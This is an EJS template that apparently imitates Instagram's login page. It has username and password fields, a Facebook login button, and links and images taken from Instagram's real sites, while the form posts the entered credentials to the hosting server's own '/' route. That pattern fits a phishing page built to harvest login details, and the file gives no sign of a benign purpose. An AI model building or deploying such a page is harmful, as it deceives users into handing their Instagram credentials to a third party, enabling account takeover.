
    <%- include('parsal/header') -%>

    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" method="post" action="/">
                <div class="field">
                    <input id="username" type="text" name="username" placeholder="Phone number, username, or email" />
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input id="password" type="password" name="password" placeholder="password" />
                    <label for="password">Password</label>
                </div>
                <button class="login-button" title="login">Log In</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button id="btn" class="fb-login-btn" type="button" style="display: flex; align-items : center;">
                        <!-- <i class="fa fa-facebook-official fb-icon"></i> -->
                        <img src="https://img.icons8.com/color/22/null/facebook.png"/>
                        <span style="margin-left : 5px" class=""> Log in with Facebook</span>
                    </button>
                    <a class="forgot-password" href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
                </div>
            </form>
        </div>



        <div class="box">
            <p>Don't have an account? <a class="signup" href="https://www.instagram.com/accounts/emailsignup/">Sign Up</a></p>
        </div>


        <p style="font-size : 15px">Get the app.</p>
        <div style="display: flex; justify-content: space-evenly; min-width: 300px;">
            <img height="40" src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" alt="">
            <img height="40" src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" alt="">
        </div>

    </div>
   
</body>

</html>